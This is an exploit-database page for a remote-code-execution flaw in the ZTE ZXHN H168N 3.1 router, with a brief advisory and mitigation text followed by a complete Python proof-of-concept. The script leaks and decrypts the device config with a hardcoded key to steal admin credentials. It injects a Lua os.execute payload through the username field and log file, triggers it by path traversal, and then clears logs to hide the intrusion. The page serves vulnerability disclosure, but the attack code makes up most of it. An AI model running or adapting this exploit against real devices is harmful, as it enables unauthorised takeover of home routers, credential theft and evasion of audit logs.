header-logo
Suggest Exploit
vendor:
ZXHN H168N
by:
l34n / tasos meletlidis
6.1
CVSS
HIGH
Remote Code Execution
CWE
Product Name: ZXHN H168N
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: NO
Related CWE:
CPE: h:zte:zxhn_h168n:3.1
Metasploit:
Other Scripts:
Platforms Tested:
2021

ZTE ZXHN H168N 3.1 – Remote Code Execution via Authentication Bypass

The ZTE ZXHN H168N 3.1 router is vulnerable to remote code execution due to an authentication bypass. By exploiting this vulnerability, an attacker can execute arbitrary code on the target device. This vulnerability has not been assigned a CVE ID yet.

Mitigation:

To mitigate this vulnerability, update the firmware of the ZTE ZXHN H168N 3.1 router to the latest version once a fixed release is available (no patch is listed at the time of writing). Additionally, restrict network access to the device's management interface and change the default login credentials.
Source

Exploit-DB raw data:

# Exploit Title:  ZTE ZXHN H168N 3.1 - RCE via authentication bypass
# Author: l34n / tasos meletlidis
# Exploit Blog: https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/

import http.client, requests, os, argparse, struct, zlib
from io import BytesIO
from os import stat
from Crypto.Cipher import AES

def login(host, port, username, password):
    """Submit the login form to the web interface at ``host:port``.

    A single form-encoded POST is sent to the root path with the supplied
    credentials and an empty ``Frm_Logintoken``. The response is discarded
    and nothing is returned.
    """
    url = f"http://{host}:{port}/"
    form = dict(
        Username=username,
        Password=password,
        Frm_Logintoken="",
        action="login",
    )
    requests.post(
        url,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data=form,
    )

def logout(host, port):
    """Submit the log-off form to the web interface at ``host:port``.

    Sends one form-encoded POST to the root path with ``IF_LogOff`` set to
    ``"1"`` and the two switch fields left empty. The response is ignored.
    """
    url = f"http://{host}:{port}/"
    form = dict(
        IF_LogOff="1",
        IF_LanguageSwitch="",
        IF_ModeSwitch="",
    )
    requests.post(
        url,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data=form,
    )

def leak_config(host, port):
    """POST to the user-config page and save the raw response to ``config.bin``.

    The request is a hand-built ``multipart/form-data`` body with a single
    empty ``config`` field, sent with ``http.client`` so the body and headers
    go out exactly as written here. Whatever bytes the server returns are
    written unmodified to ``config.bin`` in the current working directory.

    Args:
        host: Target host name or IP address.
        port: Target TCP port.

    Raises:
        OSError / http.client.HTTPException: propagated from the connection.
    """
    boundary = "---------------------------25853724551472601545982946443"
    body = (
        f"{boundary}\r\n"
        'Content-Disposition: form-data; name="config"\r\n'
        "\r\n"
        "\r\n"
        f"{boundary}--\r\n"
    )

    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        # The body is pure ASCII, so the character count equals the byte count.
        "Content-Length": str(len(body)),
        "Connection": "keep-alive",
    }

    conn = http.client.HTTPConnection(host, port)
    try:
        conn.request("POST", "/getpage.lua?pid=101&nextpage=ManagDiag_UsrCfgMgr_t.lp", body, headers)
        response_data = conn.getresponse().read()
    finally:
        # Release the socket even when the request or the read fails.
        conn.close()

    with open("config.bin", "wb") as file:
        file.write(response_data)

def _read_exactly(fd, size, desc="data"):
    chunk = fd.read(size)
    if len(chunk) != size:
        return None
    return chunk

def _read_struct(fd, fmt, desc="struct"):
    """Read and unpack one ``struct`` record of format ``fmt`` from ``fd``.

    Returns the unpacked tuple, or ``None`` when fewer than
    ``struct.calcsize(fmt)`` bytes are available.
    """
    raw = _read_exactly(fd, struct.calcsize(fmt), desc)
    return None if raw is None else struct.unpack(fmt, raw)

def read_aes_data(fd_in, key):
    """Collect the AES-encrypted chunks from ``fd_in`` and decrypt them.

    Each chunk is preceded by three big-endian 32-bit unsigned integers: the
    first is ignored, the second is the chunk length in bytes, and a zero in
    the third marks the final chunk. All chunk payloads are concatenated and
    decrypted in one pass with AES in ECB mode, using ``key`` NUL-padded or
    truncated to 16 bytes.

    Returns a ``BytesIO`` positioned at the start of the decrypted data, or
    ``None`` if any header or chunk is truncated.
    """
    pieces = []
    more = True
    while more:
        header = _read_struct(fd_in, ">3I", desc="AES chunk header")
        if header is None:
            return None
        _, length, marker = header

        piece = _read_exactly(fd_in, length, desc="AES chunk data")
        if piece is None:
            return None

        pieces.append(piece)
        more = marker != 0

    aes_key = key.ljust(16, b"\0")[:16]
    plaintext = AES.new(aes_key, AES.MODE_ECB).decrypt(b"".join(pieces))
    return BytesIO(plaintext)

def read_compressed_data(fd_in, enc_header):
    """Inflate the zlib-compressed chunks from ``fd_in`` after CRC validation.

    ``enc_header`` is a sequence of unsigned integers: element 6 must equal
    the CRC-32 of elements 0-5 packed as big-endian 32-bit values, and
    element 5 must equal the running CRC-32 over all compressed chunk bytes.

    Each chunk is preceded by three big-endian 32-bit unsigned integers:
    uncompressed length, compressed length, and a marker whose zero value
    ends the stream.

    Returns a ``BytesIO`` positioned at the start of the inflated data, or
    ``None`` on a CRC mismatch, a length mismatch, or truncated input.
    """
    expected_header_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6]))
    if expected_header_crc != enc_header[6]:
        return None

    running_crc = 0
    plain = BytesIO()
    last = False

    while not last:
        header = _read_struct(fd_in, ">3I", desc="compression chunk header")
        if header is None:
            return None
        plain_len, packed_len, marker = header

        packed = _read_exactly(fd_in, packed_len, desc="compression chunk data")
        if packed is None:
            return None

        running_crc = zlib.crc32(packed, running_crc)
        inflated = zlib.decompress(packed)
        if len(inflated) != plain_len:
            return None

        plain.write(inflated)
        last = marker == 0

    if running_crc != enc_header[5]:
        return None

    plain.seek(0)
    return plain

def read_config(fd_in, fd_out, key):
    """Decode a configuration image from ``fd_in`` and write it to ``fd_out``.

    The function walks three version headers, the signature block at offset
    0x80 and a 0x3C-byte encryption header, then undoes the encoding layers
    selected by the header's type field:

    * type 0 - zlib-compressed chunks only
    * type 1 - AES only
    * type 2 - AES around a second encryption header plus compressed chunks

    Any other type value copies the remaining bytes through unchanged.

    Args:
        fd_in: Seekable binary stream holding the image. Any seekable stream
            works; it does not need to be a named file on disk.
        fd_out: Writable binary stream that receives the decoded payload.
        key: AES key bytes; required (non-empty) for types 1 and 2.

    Returns:
        ``None`` always. On a truncated header, a bad magic value, a missing
        key, or a failed decode the function returns early without writing
        anything to ``fd_out``.
    """
    ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header")
    if ver_header_1 is None:
        return

    # The second header sits after the 0x14-byte first header plus the
    # length stored in its last field.
    fd_in.seek(0x14 + ver_header_1[4])
    ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header")
    if ver_header_2 is None:
        return

    # The last field of the second header is the absolute offset of the third.
    # Its contents are not used below; reading it only checks for truncation.
    fd_in.seek(ver_header_2[10])
    ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header")
    if ver_header_3 is None:
        return

    fd_in.seek(0x80)
    sign_header = _read_struct(fd_in, ">3I", desc="signature header")
    if sign_header is None:
        return
    if sign_header[0] != 0x04030201:
        return

    # The signature bytes are not verified; they are read only to advance
    # the stream to the encryption header that follows them.
    if _read_exactly(fd_in, sign_header[2], desc="signature") is None:
        return

    enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header")
    if enc_header_raw is None:
        return
    encryption_header = struct.unpack(">15I", enc_header_raw)
    if encryption_header[0] != 0x01020304:
        return

    enc_type = encryption_header[1]

    if enc_type in (1, 2):
        if not key:
            return
        # From here on fd_in is the in-memory decrypted stream.
        fd_in = read_aes_data(fd_in, key)
        if fd_in is None:
            return

    if enc_type == 2:
        enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header")
        if enc_header_raw is None:
            return
        encryption_header = struct.unpack(">15I", enc_header_raw)
        if encryption_header[0] != 0x01020304:
            return
        # The inner layer is handled as plain compressed data.
        enc_type = 0

    if enc_type == 0:
        fd_in = read_compressed_data(fd_in, encryption_header)
        if fd_in is None:
            return

    fd_out.write(fd_in.read())
    
def decrypt_config(config_key):
    """Decode ``config.bin`` and return the ``IGD.AU2`` account credentials.

    ``config.bin`` in the current directory is decoded into ``decrypted.xml``
    by ``read_config``. The text after the first ``IGD.AU2`` marker is then
    searched for the ``val="..."`` attributes that follow ``User`` and
    ``Pass``. Both files are deleted once the values have been extracted.

    Args:
        config_key: AES key bytes passed through to ``read_config``.

    Returns:
        A ``(username, password)`` tuple of strings.

    Raises:
        IndexError: if the expected markers are missing, for example because
            decoding failed and ``decrypted.xml`` is empty. The two files are
            left in place in that case.
    """
    # Close (and therefore flush) the output before it is re-opened for
    # reading; otherwise buffered bytes may not be on disk yet.
    with open("config.bin", "rb") as encrypted, open("decrypted.xml", "wb") as decrypted:
        read_config(encrypted, decrypted, config_key)

    with open("decrypted.xml", "r") as file:
        contents = file.read()

    account = contents.split("IGD.AU2")[1]
    username = account.split("User")[1].split("val=\"")[1].split("\"")[0]
    password = account.split("Pass")[1].split("val=\"")[1].split("\"")[0]

    # os.remove works on every platform, unlike shelling out to `rm`.
    os.remove("config.bin")
    os.remove("decrypted.xml")

    return username, password

def change_log_level(host, port, log_level):
    """Apply a log level through the log-manager page of the web interface.

    ``log_level`` must be ``"critical"`` or ``"notice"``; these map to the
    form values ``"2"`` and ``"5"``. An unknown name raises ``KeyError``
    before any request is sent. Two GETs (the page, then its Lua endpoint)
    are followed by the form POST. All responses are discarded.
    """
    level_code = {"critical": "2", "notice": "5"}[log_level]

    base = f"http://{host}:{port}"
    endpoint = f"{base}/common_page/ManagDiag_LogManag_lua.lua"

    form = {
        "IF_ACTION": "Apply",
        "_BASICCONIG": "Y",
        "LogEnable": "1",
        "LogLevel": level_code,
        "ServiceEnable": "0",
        "Btn_cancel_LogManagerConf": "",
        "Btn_apply_LogManagerConf": "",
        "downloadlog": "",
        "Btn_clear_LogManagerConf": "",
        "Btn_save_LogManagerConf": "",
        "Btn_refresh_LogManagerConf": "",
    }

    requests.get(f"{base}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(endpoint)
    requests.post(
        endpoint,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data=form,
    )

def change_username(host, port, new_username, old_password):
    """Submit the account-management form for instance ``IGD.AU2``.

    The form sets ``Username`` to ``new_username`` and sends ``old_password``
    in all three password fields, so the password itself stays the same.
    Two GETs (the page, then its Lua endpoint) precede the POST. All
    responses are discarded.
    """
    base = f"http://{host}:{port}"
    endpoint = f"{base}/common_page/accountManag_lua.lua"

    form = {
        "IF_ACTION": "Apply",
        "_InstID": "IGD.AU2",
        "Right": "2",
        "Username": new_username,
        "Password": old_password,
        "NewPassword": old_password,
        "NewConfirmPassword": old_password,
        "Btn_cancel_AccountManag": "",
        "Btn_apply_AccountManag": "",
    }

    requests.get(f"{base}/getpage.lua?pid=123&nextpage=ManagDiag_AccountManag_t.lp&Menu3Location=0")
    requests.get(endpoint)
    requests.post(
        endpoint,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data=form,
    )

def clear_log(host, port):
    """Send the ``clearlog`` action to the log-manager endpoint.

    Two GETs (the page, then its Lua endpoint) precede the form POST. All
    responses are discarded.
    """
    base = f"http://{host}:{port}"
    endpoint = f"{base}/common_page/ManagDiag_LogManag_lua.lua"

    requests.get(f"{base}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(endpoint)
    requests.post(
        endpoint,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data={"IF_ACTION": "clearlog"},
    )

def refresh_log(host, port):
    """Send the ``Refresh`` action to the log-manager endpoint.

    Two GETs (the page, then its Lua endpoint) precede the form POST. All
    responses are discarded.
    """
    base = f"http://{host}:{port}"
    endpoint = f"{base}/common_page/ManagDiag_LogManag_lua.lua"

    requests.get(f"{base}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(endpoint)
    requests.post(
        endpoint,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data={"IF_ACTION": "Refresh"},
    )

def trigger_rce(host, port):
    """Request the status page, then ``getpage.lua`` with a traversal path.

    The second request's ``nextpage`` parameter is a URL-encoded relative
    path that resolves to ``/var/userlog.txt``. Responses are discarded.
    """
    pages = (
        "ManagDiag_StatusManag_t.lp",
        "..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fuserlog.txt",
    )
    for page in pages:
        requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage={page}&Menu3Location=0")

def rce(cmd):
    """Return ``cmd`` embedded in this script's ``<? ... ?>`` template string.

    The template places ``cmd`` after ``rm /var/userlog.txt;`` inside a
    single-quoted ``_G.os.execute`` argument. ``cmd`` is inserted verbatim,
    without any escaping.
    """
    template = "<? _G.os.execute('rm /var/userlog.txt;{}') ?>"
    return template.format(cmd)

def pwn(config_key, host, port):
    """Run the full proof-of-concept sequence against ``host:port``.

    The steps are strictly ordered and each depends on device state left by
    the previous one, so the statements must not be reordered.

    Args:
        config_key: AES key bytes used to decode the downloaded config.
        host: Target host name or IP address.
        port: Target TCP port.
    """
    # Download the config image and recover the IGD.AU2 account credentials.
    leak_config(host, port)
    username, password = decrypt_config(config_key)
    
    login(host, port, username, password)

    # Demonstration command only; it is wrapped in the template built by rce().
    shellcode = "echo \"pwned\""
    payload = rce(shellcode)

    # Set the account name to the payload string, then switch the log level
    # to "notice", refreshing the log view around the change.
    change_username(host, port, payload, password)
    refresh_log(host, port)
    change_log_level(host, port, "notice")
    refresh_log(host, port)

    # Request the log file through getpage.lua, then clear the log.
    trigger_rce(host, port)
    clear_log(host, port)

    # Restore the original account name and the "critical" log level.
    change_username(host, port, username, password)
    change_log_level(host, port, "critical")
    logout(host, port)
    print("[+] PoC complete")

def main():
    """Parse the command-line options and hand them to ``pwn``.

    ``--host`` and ``--port`` are mandatory. ``--config_key`` is optional and
    is encoded to bytes; it falls back to the built-in default key.
    """
    cli = argparse.ArgumentParser(description="Run remote command on ZTE ZXHN H168N V3.1")
    cli.add_argument(
        "--config_key",
        type=lambda x: x.encode(),
        default=b"GrWM3Hz&LTvz&f^9",
        help="Leaked config encryption key from cspd",
    )
    cli.add_argument("--host", required=True, help="Target IP address of the router")
    cli.add_argument("--port", required=True, type=int, help="Target port of the router")

    options = cli.parse_args()

    pwn(options.config_key, options.host, options.port)

# Run the command-line entry point only when executed as a script, not on import.
if __name__ == "__main__":
    main()